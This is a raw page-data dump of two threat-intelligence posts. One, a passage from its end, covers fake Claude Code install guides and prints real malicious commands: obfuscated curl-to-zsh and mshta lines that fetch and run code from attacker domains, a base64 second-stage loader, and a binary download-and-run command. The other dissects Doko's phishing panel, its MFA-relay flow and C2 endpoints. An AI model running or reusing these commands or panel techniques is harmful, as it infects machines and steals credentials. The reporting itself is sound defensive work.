"content":2796},{},[2797],{"nodeType":241,"value":2798,"marks":2799,"data":2800},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":1687,"data":2802,"content":2803},{},[2804],{"nodeType":237,"data":2805,"content":2806},{},[2807],{"nodeType":241,"value":2808,"marks":2809,"data":2810},"claude-code-macos[.]com",[],{},{"nodeType":1687,"data":2812,"content":2813},{},[2814],{"nodeType":237,"data":2815,"content":2816},{},[2817],{"nodeType":241,"value":2729,"marks":2818,"data":2819},[],{},{"nodeType":1687,"data":2821,"content":2822},{},[2823],{"nodeType":237,"data":2824,"content":2825},{},[2826],{"nodeType":241,"value":2827,"marks":2828,"data":2829},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2831,"content":2832},{},[2833],{"nodeType":237,"data":2834,"content":2835},{},[2836],{"nodeType":241,"value":2837,"marks":2838,"data":2839},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2841,"content":2842},{},[2843],{"nodeType":237,"data":2844,"content":2845},{},[2846],{"nodeType":241,"value":2847,"marks":2848,"data":2849},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2851,"content":2852},{},[2853],{"nodeType":237,"data":2854,"content":2855},{},[2856],{"nodeType":241,"value":2857,"marks":2858,"data":2859},"notklmalans[.]pages[.]dev",[],{},{"nodeType":237,"data":2861,"content":2862},{},[2863],{"nodeType":241,"value":2864,"marks":2865,"data":2867},"Domains hosting malicious 
payload:",[2866],{"type":313},{},{"nodeType":1752,"data":2869,"content":2870},{},[2871,2881,2891],{"nodeType":1687,"data":2872,"content":2873},{},[2874],{"nodeType":237,"data":2875,"content":2876},{},[2877],{"nodeType":241,"value":2878,"marks":2879,"data":2880},"contatoplus[.]com",[],{},{"nodeType":1687,"data":2882,"content":2883},{},[2884],{"nodeType":237,"data":2885,"content":2886},{},[2887],{"nodeType":241,"value":2888,"marks":2889,"data":2890},"sarahmoftah[.]com",[],{},{"nodeType":1687,"data":2892,"content":2893},{},[2894],{"nodeType":237,"data":2895,"content":2896},{},[2897],{"nodeType":241,"value":2898,"marks":2899,"data":2900},"claude[.]update-version[.]com",[],{},{"nodeType":237,"data":2902,"content":2903},{},[2904],{"nodeType":241,"value":2905,"marks":2906,"data":2908},"Commands:",[2907],{"type":313},{},{"nodeType":237,"data":2910,"content":2911},{},[2912],{"nodeType":241,"value":2913,"marks":2914,"data":2917},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[2915],{"type":2916},"code",{},{"nodeType":237,"data":2919,"content":2920},{},[2921],{"nodeType":241,"value":29,"marks":2922,"data":2923},[],{},{"nodeType":237,"data":2925,"content":2926},{},[2927],{"nodeType":241,"value":2928,"marks":2929,"data":2931},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[2930],{"type":2916},{},{"nodeType":237,"data":2933,"content":2934},{},[2935],{"nodeType":241,"value":2936,"marks":2937,"data":2938},"\n",[],{},{"nodeType":237,"data":2940,"content":2941},{},[2942],{"nodeType":241,"value":2943,"marks":2944,"data":2946},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude 
",[2945],{"type":2916},{},{"nodeType":237,"data":2948,"content":2949},{},[2950,2953],{"nodeType":241,"value":2936,"marks":2951,"data":2952},[],{},{"nodeType":241,"value":2954,"marks":2955,"data":2957},"Base64 decoded url:",[2956],{"type":313},{},{"nodeType":237,"data":2959,"content":2960},{},[2961],{"nodeType":241,"value":2962,"marks":2963,"data":2965},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[2964],{"type":2916},{},{"nodeType":237,"data":2967,"content":2968},{},[2969],{"nodeType":241,"value":29,"marks":2970,"data":2971},[],{},{"nodeType":237,"data":2973,"content":2974},{},[2975],{"nodeType":241,"value":2976,"marks":2977,"data":2979},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[2978],{"type":2916},{},{"nodeType":237,"data":2981,"content":2982},{},[2983,2986],{"nodeType":241,"value":2936,"marks":2984,"data":2985},[],{},{"nodeType":241,"value":2987,"marks":2988,"data":2990},"Second stage:",[2989],{"type":313},{},{"nodeType":237,"data":2992,"content":2993},{},[2994],{"nodeType":241,"value":2995,"marks":2996,"data":2998},"#!/bin/zsh",[2997],{"type":2916},{},{"nodeType":237,"data":3000,"content":3001},{},[3002],{"nodeType":241,"value":3003,"marks":3004,"data":3006},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | 
gunzip",[3005],{"type":2916},{},{"nodeType":237,"data":3008,"content":3009},{},[3010],{"nodeType":241,"value":3011,"marks":3012,"data":3014},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[3013],{"type":2916},{},{"nodeType":237,"data":3016,"content":3017},{},[3018],{"nodeType":241,"value":3019,"marks":3020,"data":3022},"PAYLOAD_END",[3021],{"type":2916},{},{"nodeType":237,"data":3024,"content":3025},{},[3026],{"nodeType":241,"value":3027,"marks":3028,"data":3030},")",[3029],{"type":2916},{},{"nodeType":237,"data":3032,"content":3033},{},[3034],{"nodeType":241,"value":3035,"marks":3036,"data":3038},"eval \"$mkgrc9\"",[3037],{"type":2916},{},{"nodeType":237,"data":3040,"content":3041},{},[3042,3045],{"nodeType":241,"value":2936,"marks":3043,"data":3044},[],{},{"nodeType":241,"value":3046,"marks":3047,"data":3049},"Binaries:",[3048],{"type":313},{},{"nodeType":237,"data":3051,"content":3052},{},[3053],{"nodeType":241,"value":2995,"marks":3054,"data":3056},[3055],{"type":2916},{},{"nodeType":237,"data":3058,"content":3059},{},[3060],{"nodeType":241,"value":3061,"marks":3062,"data":3064},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[3063],{"type":2916},{},"InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","installfix",{"items":3069},[3070,3072],{"sys":3071,"name":2041},{"id":2040},{"sys":3073,"name":2045},{"id":2044},{"items":3075},[3076],{"fullName":3077,"firstName":3078,"jobTitle":3079,"profilePicture":3080},"Jacques Louw","Jacques","Co-founder / 
CRO",{"url":3081},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":1180,"sys":3083,"publishedDate":3085,"content":3086,"title":4987,"synopsis":4988,"hashTags":62,"slug":4989,"tagsCollection":4990,"authorsCollection":4996},{"id":3084},"2tz0zEJCarJBkceOYk4zVg","2026-05-07T00:00:00.000Z",{"json":3087},{"nodeType":233,"data":3088,"content":3089},{},[3090,3097,3127,3138,3145,3151,3163,3169,3172,3180,3187,3250,3257,3263,3266,3274,3281,3287,3295,3302,3428,3434,3440,3446,3452,3460,3467,3474,3537,3544,3550,3556,3564,3571,3578,3586,3593,3626,3633,3639,3646,3694,3701,3709,3716,3722,3729,3736,3742,3749,3782,3789,3795,3798,3806,3813,3820,3827,3833,3840,3847,3853,3860,3866,3873,3879,3886,3893,3896,3904,3920,3927,3947,4190,4197,4229,4464,4471,4478,4679,4686,4871,4874,4882,4889,4896,4908,4911,4918,4935,4952,4959,4962,4970],{"nodeType":237,"data":3091,"content":3092},{},[3093],{"nodeType":241,"value":3094,"marks":3095,"data":3096},"When Push blocks an attack in the browser, we take the opportunity to do some more digging to see what else we can find. One recent detection led us down the rabbit hole — and right into a criminal phishing panel. 
",[],{},{"nodeType":237,"data":3098,"content":3099},{},[3100,3104,3111,3115,3123],{"nodeType":241,"value":3101,"marks":3102,"data":3103},"Real-time operated phishing panels have been used extensively in recent months, in vishing + phishing attacks attributed first to ",[],{},{"nodeType":260,"data":3105,"content":3106},{"uri":1700},[3107],{"nodeType":241,"value":3108,"marks":3109,"data":3110},"ShinyHunters",[],{},{"nodeType":241,"value":3112,"marks":3113,"data":3114},", and more recently the ",[],{},{"nodeType":260,"data":3116,"content":3118},{"uri":3117},"https://www.bleepingcomputer.com/news/security/new-blackfile-extortion-gang-targets-retail-and-hospitality-orgs/",[3119],{"nodeType":241,"value":3120,"marks":3121,"data":3122},"BlackFile",[],{},{"nodeType":241,"value":3124,"marks":3125,"data":3126}," hacking group, with a significant overlap in techniques and tooling. ",[],{},{"nodeType":237,"data":3128,"content":3129},{},[3130,3135],{"nodeType":241,"value":3131,"marks":3132,"data":3134},"We’ve directly accessed active deployments of the operator panels driving these campaigns, observed what happens in real-time when a victim is targeted, and analyzed multiple variants and forks of the tooling. ",[3133],{"type":313},{},{"nodeType":241,"value":566,"marks":3136,"data":3137},[],{},{"nodeType":237,"data":3139,"content":3140},{},[3141],{"nodeType":241,"value":3142,"marks":3143,"data":3144},"We identified four primary infrastructure clusters, with each deployment having its own panel implementation. 
While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",[],{},{"nodeType":292,"data":3146,"content":3150},{"target":3147},{"sys":3148},{"id":3149,"type":297,"linkType":298},"5BQOpzjSbobLx8OkvXl6os",[],{"nodeType":237,"data":3152,"content":3153},{},[3154,3158],{"nodeType":241,"value":3155,"marks":3156,"data":3157},"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now most likely accessible to a broad population of financially motivated threat actors. ",[],{},{"nodeType":241,"value":3159,"marks":3160,"data":3162},"In total, we’ve identified over 400 domains linked to the attacks, giving an indication of the scale. ",[3161],{"type":313},{},{"nodeType":292,"data":3164,"content":3168},{"target":3165},{"sys":3166},{"id":3167,"type":297,"linkType":298},"2Z1LUdYXVONWO9nnJTkWsJ",[],{"nodeType":320,"data":3170,"content":3171},{},[],{"nodeType":324,"data":3173,"content":3174},{},[3175],{"nodeType":241,"value":3176,"marks":3177,"data":3179},"Background",[3178],{"type":313},{},{"nodeType":237,"data":3181,"content":3182},{},[3183],{"nodeType":241,"value":3184,"marks":3185,"data":3186},"Since at least August 2025, attackers have been running hybrid social engineering campaigns targeting hundreds of organizations across financial services, technology, cryptocurrency, healthcare, hospitality, and private aviation. 
",[],{},{"nodeType":1752,"data":3188,"content":3189},{},[3190,3205,3220,3235],{"nodeType":1687,"data":3191,"content":3192},{},[3193],{"nodeType":237,"data":3194,"content":3195},{},[3196,3201],{"nodeType":241,"value":3197,"marks":3198,"data":3200},"August 2025: ",[3199],{"type":313},{},{"nodeType":241,"value":3202,"marks":3203,"data":3204},"Tooling made available, used in crypto-focused attacks",[],{},{"nodeType":1687,"data":3206,"content":3207},{},[3208],{"nodeType":237,"data":3209,"content":3210},{},[3211,3216],{"nodeType":241,"value":3212,"marks":3213,"data":3215},"November 2025:",[3214],{"type":313},{},{"nodeType":241,"value":3217,"marks":3218,"data":3219}," Major attacks on enterprise identity platforms begin",[],{},{"nodeType":1687,"data":3221,"content":3222},{},[3223],{"nodeType":237,"data":3224,"content":3225},{},[3226,3231],{"nodeType":241,"value":3227,"marks":3228,"data":3230},"January 2026: ",[3229],{"type":313},{},{"nodeType":241,"value":3232,"marks":3233,"data":3234},"Public breaches reported",[],{},{"nodeType":1687,"data":3236,"content":3237},{},[3238],{"nodeType":237,"data":3239,"content":3240},{},[3241,3246],{"nodeType":241,"value":3242,"marks":3243,"data":3245},"March 2026: ",[3244],{"type":313},{},{"nodeType":241,"value":3247,"marks":3248,"data":3249},"Activity spikes again",[],{},{"nodeType":237,"data":3251,"content":3252},{},[3253],{"nodeType":241,"value":3254,"marks":3255,"data":3256},"The attacks combine voice phishing with MFA-bypassing adversary-in-the-middle (AiTM) phishing mechanisms that allow the attacker to steal authenticated sessions for target applications — typically enterprise identity providers and cryptocurrency exchanges. Once an identity provider account is compromised, the attackers pivot across connected SaaS platforms — SharePoint, Salesforce, DocuSign, Slack — exfiltrate data, and attempt to extort the victim organization. 
",[],{},{"nodeType":292,"data":3258,"content":3262},{"target":3259},{"sys":3260},{"id":3261,"type":297,"linkType":298},"2X2YXMpozrbRQhegk7yF1k",[],{"nodeType":320,"data":3264,"content":3265},{},[],{"nodeType":324,"data":3267,"content":3268},{},[3269],{"nodeType":241,"value":3270,"marks":3271,"data":3273},"Inside the panels: what Push found",[3272],{"type":313},{},{"nodeType":237,"data":3275,"content":3276},{},[3277],{"nodeType":241,"value":3278,"marks":3279,"data":3280},"Push detected an active Okta phishing site with TTPs aligned to the tooling used by SLH and affiliated groups. Through analysis of the phishing infrastructure, we gained direct access to Doko’s Panel and variants, and were able to observe how these attacks unfold from the operator's perspective — including real victim submission logs from the current week confirming ongoing active operations.",[],{},{"nodeType":292,"data":3282,"content":3286},{"target":3283},{"sys":3284},{"id":3285,"type":297,"linkType":298},"5ND0etPs5xN7ejz24l71jy",[],{"nodeType":605,"data":3288,"content":3289},{},[3290],{"nodeType":241,"value":3291,"marks":3292,"data":3294},"How the attack works",[3293],{"type":313},{},{"nodeType":237,"data":3296,"content":3297},{},[3298],{"nodeType":241,"value":3299,"marks":3300,"data":3301},"The general sequence of steps is the same across the panels:",[],{},{"nodeType":1752,"data":3303,"content":3304},{},[3305,3320,3335,3359,3374,3389,3413],{"nodeType":1687,"data":3306,"content":3307},{},[3308],{"nodeType":237,"data":3309,"content":3310},{},[3311,3316],{"nodeType":241,"value":3312,"marks":3313,"data":3315},"The operator calls the target",[3314],{"type":313},{},{"nodeType":241,"value":3317,"marks":3318,"data":3319}," spoofing the organization's IT helpdesk number, often referencing real employee names or internal ticket numbers to establish trust. 
The target is directed to a phishing domain — usually following a combosquatting pattern like my\u003Ctarget>internal[.]com or \u003Ctarget>sso[.]com — under the pretext of a mandatory security update, passkey enrollment, or support ticket resolution. ",[],{},{"nodeType":1687,"data":3321,"content":3322},{},[3323],{"nodeType":237,"data":3324,"content":3325},{},[3326,3331],{"nodeType":241,"value":3327,"marks":3328,"data":3330},"The victim lands on the phishing domain",[3329],{"type":313},{},{"nodeType":241,"value":3332,"marks":3333,"data":3334}," and is presented with a loading spinner — the anti-bot gate that prevents unauthorized access to the phishing pages.",[],{},{"nodeType":1687,"data":3336,"content":3337},{},[3338],{"nodeType":237,"data":3339,"content":3340},{},[3341,3346,3350,3355],{"nodeType":241,"value":3342,"marks":3343,"data":3345},"The operator accepts the visitor",[3344],{"type":313},{},{"nodeType":241,"value":3347,"marks":3348,"data":3349}," from the admin panel and ",[],{},{"nodeType":241,"value":3351,"marks":3352,"data":3354},"the victim is redirected",[3353],{"type":313},{},{"nodeType":241,"value":3356,"marks":3357,"data":3358}," to the cloned login page (e.g. Google, Microsoft, Okta).",[],{},{"nodeType":1687,"data":3360,"content":3361},{},[3362],{"nodeType":237,"data":3363,"content":3364},{},[3365,3370],{"nodeType":241,"value":3366,"marks":3367,"data":3369},"The victim enters their email address and password",[3368],{"type":313},{},{"nodeType":241,"value":3371,"marks":3372,"data":3373},", which is forwarded to the operator's Telegram channel. The victim sees a processing spinner on the branded login form.",[],{},{"nodeType":1687,"data":3375,"content":3376},{},[3377],{"nodeType":237,"data":3378,"content":3379},{},[3380,3385],{"nodeType":241,"value":3381,"marks":3382,"data":3384},"The operator relays the credentials",[3383],{"type":313},{},{"nodeType":241,"value":3386,"marks":3387,"data":3388}," to the real identity provider. 
If they're valid, the attack proceeds. If they're invalid, the operator can redirect the victim back to the credential entry pages. Assuming MFA is required, the operator issues a redirect to an appropriate MFA capture page — \"Submit SMS OTP,\" \"Submit Gauth OTP,\" or \"Approve [XX] Prompt,\" depending on what the legitimate IdP is presenting.",[],{},{"nodeType":1687,"data":3390,"content":3391},{},[3392],{"nodeType":237,"data":3393,"content":3394},{},[3395,3400,3404,3409],{"nodeType":241,"value":3396,"marks":3397,"data":3399},"The victim submits their OTP or approves the push notification ",[3398],{"type":313},{},{"nodeType":241,"value":3401,"marks":3402,"data":3403},"and",[],{},{"nodeType":241,"value":3405,"marks":3406,"data":3408}," the operator relays the OTP",[3407],{"type":313},{},{"nodeType":241,"value":3410,"marks":3411,"data":3412}," in their own login session, completes authentication, and captures the session. ",[],{},{"nodeType":1687,"data":3414,"content":3415},{},[3416],{"nodeType":237,"data":3417,"content":3418},{},[3419,3424],{"nodeType":241,"value":3420,"marks":3421,"data":3423},"The victim is redirected to a benign page",[3422],{"type":313},{},{"nodeType":241,"value":3425,"marks":3426,"data":3427}," (e.g., Google Drive) or to a support ticket closure screen displaying a fabricated ticket number.",[],{},{"nodeType":292,"data":3429,"content":3433},{"target":3430},{"sys":3431},{"id":3432,"type":297,"linkType":298},"1o0wm3EOd7zSl5MddsNxgL",[],{"nodeType":292,"data":3435,"content":3439},{"target":3436},{"sys":3437},{"id":3438,"type":297,"linkType":298},"7w7SQEn3aITpcgXLMThhbS",[],{"nodeType":237,"data":3441,"content":3442},{},[3443],{"nodeType":241,"value":29,"marks":3444,"data":3445},[],{},{"nodeType":292,"data":3447,"content":3451},{"target":3448},{"sys":3449},{"id":3450,"type":297,"linkType":298},"PJJabY1ZfoCfl8XQ6PMj2",[],{"nodeType":605,"data":3453,"content":3454},{},[3455],{"nodeType":241,"value":3456,"marks":3457,"data":3459},"Doko’s 
Panel",[3458],{"type":313},{},{"nodeType":237,"data":3461,"content":3462},{},[3463],{"nodeType":241,"value":3464,"marks":3465,"data":3466},"Let’s take a closer look at the panels themselves. We'll start with the default version of Doko's Panel since it’s the most established. It provides a multi-functional framework targeting users of Google, Microsoft Entra, Okta, and popular cryptocurrency exchanges including Abra, Coinbase, Gemini, and Kraken. Its core functionality resides in a client-side JavaScript file (client.js) that establishes the real-time feedback loop between the victim's browser and the operator's C2.",[],{},{"nodeType":237,"data":3468,"content":3469},{},[3470],{"nodeType":241,"value":3471,"marks":3472,"data":3473},"The technical indicators that characterize Doko's Panel in its standard form include:",[],{},{"nodeType":1752,"data":3475,"content":3476},{},[3477,3492,3507,3522],{"nodeType":1687,"data":3478,"content":3479},{},[3480],{"nodeType":237,"data":3481,"content":3482},{},[3483,3488],{"nodeType":241,"value":3484,"marks":3485,"data":3487},"client.js",[3486],{"type":313},{},{"nodeType":241,"value":3489,"marks":3490,"data":3491}," containing a pingServer() function that sends a JSON POST request to /backend.php every second with the structure { action: 'ping', token, window_id, page, os, browser }. If the response contains a redirect key, the victim's browser navigates to that path. 
",[],{},{"nodeType":1687,"data":3493,"content":3494},{},[3495],{"nodeType":237,"data":3496,"content":3497},{},[3498,3503],{"nodeType":241,"value":3499,"marks":3500,"data":3502},"sendTelegramMessage()",[3501],{"type":313},{},{"nodeType":241,"value":3504,"marks":3505,"data":3506}," (aliased to sendtg()), a function for relaying real-time credential submissions and session updates to the operator's Telegram channel.",[],{},{"nodeType":1687,"data":3508,"content":3509},{},[3510],{"nodeType":237,"data":3511,"content":3512},{},[3513,3518],{"nodeType":241,"value":3514,"marks":3515,"data":3517},"backend.php",[3516],{"type":313},{},{"nodeType":241,"value":3519,"marks":3520,"data":3521}," as the primary server-side handler for both victim ping actions and admin panel operations (retrieving connected victim information, sending redirect instructions).",[],{},{"nodeType":1687,"data":3523,"content":3524},{},[3525],{"nodeType":237,"data":3526,"content":3527},{},[3528,3533],{"nodeType":241,"value":3529,"marks":3530,"data":3532},"j.php",[3531],{"type":313},{},{"nodeType":241,"value":3534,"marks":3535,"data":3536}," as the endpoint for sending Telegram messages, relaying captured credentials and session logs.",[],{},{"nodeType":237,"data":3538,"content":3539},{},[3540],{"nodeType":241,"value":3541,"marks":3542,"data":3543},"Push found that deployments of Doko's Panel had minimal security by default — anyone was able to view the admin panel and manage visitors' connections without authentication.",[],{},{"nodeType":292,"data":3545,"content":3549},{"target":3546},{"sys":3547},{"id":3548,"type":297,"linkType":298},"3glwGSGHdCpf3DLqNmQqN8",[],{"nodeType":292,"data":3551,"content":3555},{"target":3552},{"sys":3553},{"id":3554,"type":297,"linkType":298},"20ymWIXMkmJlw7XYb93c9o",[],{"nodeType":605,"data":3557,"content":3558},{},[3559],{"nodeType":241,"value":3560,"marks":3561,"data":3563},"Panel proliferation and 
remixes",[3562],{"type":313},{},{"nodeType":237,"data":3565,"content":3566},{},[3567],{"nodeType":241,"value":3568,"marks":3569,"data":3570},"Access to Doko's Panel has clearly proliferated beyond its original developers, resulting in remixes and variants being distributed across the ecosystem. Push identified a variant titled \"Lord Mensius's Panel\" targeting Koinly (a cryptocurrency tax platform), and another titled \"$$$\" using a template impersonating the Australian Tax Office, also targeting cryptocurrency tax filing. ",[],{},{"nodeType":237,"data":3572,"content":3573},{},[3574],{"nodeType":241,"value":3575,"marks":3576,"data":3577},"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now accessible to a broad population of financially motivated threat actors. ",[],{},{"nodeType":605,"data":3579,"content":3580},{},[3581],{"nodeType":241,"value":3582,"marks":3583,"data":3585},"heartbeat/check_redirect variant",[3584],{"type":313},{},{"nodeType":237,"data":3587,"content":3588},{},[3589],{"nodeType":241,"value":3590,"marks":3591,"data":3592},"In addition to Doko’s Panel and its forks, the site initially detected by Push used a modified variant of Doko's Panel with a different C2 protocol. 
Rather than the standard ping action, this variant sent two types of regular requests from client.js to the backend:",[],{},{"nodeType":1752,"data":3594,"content":3595},{},[3596,3611],{"nodeType":1687,"data":3597,"content":3598},{},[3599],{"nodeType":237,"data":3600,"content":3601},{},[3602,3607],{"nodeType":241,"value":3603,"marks":3604,"data":3606},"Heartbeat",[3605],{"type":313},{},{"nodeType":241,"value":3608,"marks":3609,"data":3610}," — POST to backend.php with action=heartbeat along with page, token, and window_id.",[],{},{"nodeType":1687,"data":3612,"content":3613},{},[3614],{"nodeType":237,"data":3615,"content":3616},{},[3617,3622],{"nodeType":241,"value":3618,"marks":3619,"data":3621},"Check Redirect",[3620],{"type":313},{},{"nodeType":241,"value":3623,"marks":3624,"data":3625}," — GET to backend.php with parameters action=check_redirect along with token and window_id.",[],{},{"nodeType":237,"data":3627,"content":3628},{},[3629],{"nodeType":241,"value":3630,"marks":3631,"data":3632},"A redirect instruction in response to either request causes the victim's browser to navigate to the specified page. The variant compounds this with a separate inline script embedded in the landing gate HTML — in addition to client.js — that schedules its own sendHeartbeat() and checkRedirect() functions on regular intervals. 
",[],{},{"nodeType":292,"data":3634,"content":3638},{"target":3635},{"sys":3636},{"id":3637,"type":297,"linkType":298},"6zRc9ublZvEQCxcWtMBSnF",[],{"nodeType":237,"data":3640,"content":3641},{},[3642],{"nodeType":241,"value":3643,"marks":3644,"data":3645},"Additional technical differentiators for this variant include:",[],{},{"nodeType":1752,"data":3647,"content":3648},{},[3649,3664,3679],{"nodeType":1687,"data":3650,"content":3651},{},[3652],{"nodeType":237,"data":3653,"content":3654},{},[3655,3660],{"nodeType":241,"value":3656,"marks":3657,"data":3659},"UUID generation",[3658],{"type":313},{},{"nodeType":241,"value":3661,"marks":3662,"data":3663}," using Math.random() to replace x in the template xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx, rather than the original Doko's Panel method of constructing a template from [1e7]+-1e3+-4e3+-8e3+-1e11 and replacing [018].",[],{},{"nodeType":1687,"data":3665,"content":3666},{},[3667],{"nodeType":237,"data":3668,"content":3669},{},[3670,3675],{"nodeType":241,"value":3671,"marks":3672,"data":3674},"No central Telegram sending function",[3673],{"type":313},{},{"nodeType":241,"value":3676,"marks":3677,"data":3678},", though j.php still exists and is called from inline scripts on individual phishing pages.",[],{},{"nodeType":1687,"data":3680,"content":3681},{},[3682],{"nodeType":237,"data":3683,"content":3684},{},[3685,3690],{"nodeType":241,"value":3686,"marks":3687,"data":3689},"No use of FNV-1a",[3688],{"type":313},{},{"nodeType":241,"value":3691,"marks":3692,"data":3693}," to hash-generate the window ID.",[],{},{"nodeType":237,"data":3695,"content":3696},{},[3697],{"nodeType":241,"value":3698,"marks":3699,"data":3700},"Push also found sub-variants hosting Okta phishing pages with additional modifications: a minified client.js script, and a renamed backend endpoint (api_FyekIDWY.php replacing backend.php).",[],{},{"nodeType":605,"data":3702,"content":3703},{},[3704],{"nodeType":241,"value":3705,"marks":3706,"data":3708},"Revamped 
admin panel",[3707],{"type":313},{},{"nodeType":237,"data":3710,"content":3711},{},[3712],{"nodeType":241,"value":3713,"marks":3714,"data":3715},"Push also found examples of a significantly revamped admin panel, including a version from April 2026 specifically targeting Microsoft as an enterprise identity provider. ",[],{},{"nodeType":292,"data":3717,"content":3721},{"target":3718},{"sys":3719},{"id":3720,"type":297,"linkType":298},"3ufb4cotpg0f7yoIQJnND0",[],{"nodeType":237,"data":3723,"content":3724},{},[3725],{"nodeType":241,"value":3726,"marks":3727,"data":3728},"This panel featured a more sophisticated operator interface with an updated look, quick action buttons, and sound notifications.",[],{},{"nodeType":237,"data":3730,"content":3731},{},[3732],{"nodeType":241,"value":3733,"marks":3734,"data":3735},"In addition to the standard compromise flow for acquiring email, password, and OTP, this panel provided operator actions for sending Microsoft Teams call instructions to the victim — a Meeting ID and Passcode rendered on a branded page. This capability likely enables further interaction through a channel that supports screensharing, extending the attacker's reach beyond credential theft into live session manipulation. 
It also has the potential to make the scenario more believable for the victim.",[],{},{"nodeType":292,"data":3737,"content":3741},{"target":3738},{"sys":3739},{"id":3740,"type":297,"linkType":298},"4pg65d1SvTJA3xm6AsxZBp",[],{"nodeType":237,"data":3743,"content":3744},{},[3745],{"nodeType":241,"value":3746,"marks":3747,"data":3748},"Other capabilities were referenced in the panel's source code but did not appear active in the observed deployment:",[],{},{"nodeType":1752,"data":3750,"content":3751},{},[3752,3767],{"nodeType":1687,"data":3753,"content":3754},{},[3755],{"nodeType":237,"data":3756,"content":3757},{},[3758,3763],{"nodeType":241,"value":3759,"marks":3760,"data":3762},"Additional MFA approval pages",[3761],{"type":313},{},{"nodeType":241,"value":3764,"marks":3765,"data":3766}," for Duo and Okta, with the operator providing a code to display to the victim.",[],{},{"nodeType":1687,"data":3768,"content":3769},{},[3770],{"nodeType":237,"data":3771,"content":3772},{},[3773,3778],{"nodeType":241,"value":3774,"marks":3775,"data":3777},"A code execution prompt",[3776],{"type":313},{},{"nodeType":241,"value":3779,"marks":3780,"data":3781}," to instruct the victim to run a command — the placeholder example being mshta to execute a remote HTA file, suggesting a potential bridge from identity compromise into malware delivery.",[],{},{"nodeType":237,"data":3783,"content":3784},{},[3785],{"nodeType":241,"value":3786,"marks":3787,"data":3788},"The admin panel also included settings for restricting access to specific geographic locations and device types, allowing operators to refine their campaign targeting and also avoid detection from unusual devices (often an indicator that the visitor is not a real human and is actually a security tool or 
bot).",[],{},{"nodeType":292,"data":3790,"content":3794},{"target":3791},{"sys":3792},{"id":3793,"type":297,"linkType":298},"1hebGtxbkyuejWXczwx5n6",[],{"nodeType":320,"data":3796,"content":3797},{},[],{"nodeType":324,"data":3799,"content":3800},{},[3801],{"nodeType":241,"value":3802,"marks":3803,"data":3805},"LLM-generated tells: vibe-coded phishing infrastructure",[3804],{"type":313},{},{"nodeType":237,"data":3807,"content":3808},{},[3809],{"nodeType":241,"value":3810,"marks":3811,"data":3812},"Evidence of extensive LLM use is extremely prevalent in attacks detected by Push, from LLM-generated phishing kits and tools to vibe-coded cloned pages. Attackers have also been observed leveraging AI-assisted capabilities in SaaS platforms to automate and scale up their campaigns from an infrastructure and operations perspective. ",[],{},{"nodeType":237,"data":3814,"content":3815},{},[3816],{"nodeType":241,"value":3817,"marks":3818,"data":3819},"The ‘heartbeat’ variant in particular has significant tells of heavy use of LLMs to modify the phishing panel for the operator’s needs. 
The fact that these are so blatant increases the belief that these tools are being vibe-coded by relatively inexperienced developers with limited regard for operational security.",[],{},{"nodeType":237,"data":3821,"content":3822},{},[3823],{"nodeType":241,"value":3824,"marks":3825,"data":3826},"Some versions of client.js begin with verbose header comments that no human developer would write:",[],{},{"nodeType":292,"data":3828,"content":3832},{"target":3829},{"sys":3830},{"id":3831,"type":297,"linkType":298},"01mOiserRBXraawXwQyJNm",[],{"nodeType":237,"data":3834,"content":3835},{},[3836],{"nodeType":241,"value":3837,"marks":3838,"data":3839},"The \"NOTES FOR NEXT SESSION\" header is particularly telling — it's a pattern generated by LLMs that maintain context between chat sessions, not a convention any human developer would adopt in production code, let alone in a phishing kit where operational security should discourage self-documenting infrastructure.",[],{},{"nodeType":237,"data":3841,"content":3842},{},[3843],{"nodeType":241,"value":3844,"marks":3845,"data":3846},"The admin panel HTML contains similarly over-documented opening comments:",[],{},{"nodeType":292,"data":3848,"content":3852},{"target":3849},{"sys":3850},{"id":3851,"type":297,"linkType":298},"60snRhz0RIsvLI6OU9RDOk",[],{"nodeType":237,"data":3854,"content":3855},{},[3856],{"nodeType":241,"value":3857,"marks":3858,"data":3859},"One of the Okta cloned login pages observed by Push contained the following comments suggesting the use of an LLM to create the 